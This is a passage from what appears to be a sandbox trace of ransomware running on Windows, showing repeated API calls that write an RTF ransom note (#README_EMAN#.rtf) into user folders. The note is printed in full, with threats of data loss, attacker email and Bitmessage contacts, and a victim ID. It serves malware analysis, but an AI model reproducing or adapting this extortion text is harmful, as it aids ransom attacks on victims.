\\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.189] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.190] CloseHandle (hObject=0x294) returned 1 [0278.190] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\#readme_eman#.rtf")) returned 0xffffffff [0278.190] GetLastError () returned 0x2 [0278.190] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.191] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 